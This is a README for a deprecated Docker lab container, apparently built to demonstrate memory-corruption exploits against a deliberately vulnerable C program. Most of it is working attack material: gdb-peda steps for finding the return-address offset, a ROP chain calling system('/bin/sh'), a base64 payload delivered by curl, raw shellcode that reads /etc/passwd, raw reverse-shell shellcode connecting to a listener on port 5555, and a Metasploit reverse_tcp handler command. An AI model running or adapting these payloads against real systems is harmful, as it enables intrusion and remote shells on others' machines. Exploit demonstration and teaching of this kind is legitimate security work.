DEPRECATION NOTICE

Please note that this repository has been deprecated and is no longer actively maintained by Polyverse Corporation. It may be removed in the future, but for now remains public for the benefit of any users.

Importantly, as the repository has not been maintained, it may contain unpatched security issues and other critical issues. Use at your own risk.

While it is not maintained, we would graciously consider any pull requests in accordance with our Individual Contributor License Agreement. https://github.com/polyverse/contributor-license-agreement

For any other issues, please feel free to contact info@polyverse.com

---

c-exploit

Build

pv build docker
docker run -it --rm --privileged -p 8080:80 --name c-exploit polyverse/c-exploit

NOTES ABOUT USING LEAK EXPLOIT

echo 2 | tee /proc/sys/kernel/randomize_va_space

From the first terminal window

docker run -it --rm --privileged -p 8080:80 --name c-exploit polyverse/c-exploit

From another terminal window

docker exec -it c-exploit /bin/sh socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak

From a third terminal window

docker exec -it c-exploit /bin/sh python leak.py #You may need to try this three or more times. Don't know why.

NOTES FROM ROYs LAPTOP

echo 0 | tee /proc/sys/kernel/randomize_va_space

# Determine offset of return address
gdb ./overflow
pattern_arg 100
gdb-peda$ run
gdb-peda$ x/wx $rsp
0x7fffffffe758:	0x41414341
gdb-peda$ pattern_offset 0x41414341
1094796097 found at offset: 17
gdb-peda$ print $rsp
$2 = (void *) 0x7fffffffe868

# Find a "pop rdi" gadget
gdb-peda$ ropsearch "pop rdi"
Searching for ROP gadget: 'pop rdi' in: binary ranges
0x00400a63 : (5fc3)	pop rdi; ret

# Find "/bin/sh" somewhere
gdb-peda$ searchmem "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7b943e8 --> 0x68732f6e69622f ('/bin/sh')

# (Optional) Find "uname" somewhere
gdb-peda$ searchmem "uname" 
Searching for 'uname' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7a47031 --> 0x636c00656d616e75 ('uname')

# Find the "system" call
gdb-peda$ print system
$1 = {<text variable, no debug info>} 0x7ffff7a72490 <__libc_system>

# Build the payload
python payload.py 17 0x00400a63 0x7ffff7b943e8 0x7ffff7a72490 > payload
cat payload | base64 > payload64
(Add a "=" to the end of payload64)

# Test locally
./overflow $(cat payload64)
# Or
gdb ./overflow
break main
run $(cat payload64)
c

# Test remotely
curl localhost/index.php?q=QUFBQUFBQUFBQUFBQUFBQUEDCkAAAAAAADFwpPf/fwAAkCSn9/9/AAAK=

Try something different

Place a shellcode on the stack

export PWN=python -c 'print "\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41"'

Find its address

./getenvaddr PWN ./overflow PWN will be at 0x7fff62721e9c

Build the payload

python payload.py 17 0x7fff62721e9c > payload cat payload | base64 > payload64 (Add a "=" to the end of payload64)

Try a reverse shell

Place a shellcode on the stack

export PWN=python -c 'print "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x15\xb3\xc7\x44\x24\x04\xac\x10\x01\x1f\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"'

Find its address

./getenvaddr PWN ./overflow PWN will be at 0x7fffffffee78

Build the payload

python payload.py 17 0x7fffffffee78 > payload cat payload | base64 > payload64 (Add a "=" to the end of payload64)

BTW: You'll need this running

nc -v -l 5555

NOTES FROM CHRIS' LAPTOP

gdb-peda$ print system
$8 = {<text variable, no debug info>} 0x7ffff7a72490 <__libc_system>

gdb-peda$ searchmem "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7b943e8 --> 0x68732f6e69622f ('/bin/sh')

gdb-peda$ ropsearch "pop rdi"
Searching for ROP gadget: 'pop rdi' in: binary ranges
0x00400673 : (5fc3)	pop rdi; ret

You can use this container in conjunction with polyverse-internal.jfrog.io/kali-metasploit. Run the following command:

docker run -it -p 5555:5555 polyverse-internal.jfrog.io/kali-metasploit msfconsole -x "use multi/handler; set payload linux/x86/shell_reverse_tcp; set LHOST $(docker run -it -p 5555:5555 polyverse-internal.jfrog.io/kali-metasploit ifconfig eth0 | grep inet | awk '{print $2}'); set LPORT 5555; exploit"

Then modify evil.c to use the LHOST and LPORT values from the metasploit container tty.

• From Mariusz: https://www.offensive-security.com/metasploit-unleashed/writing-an-exploit/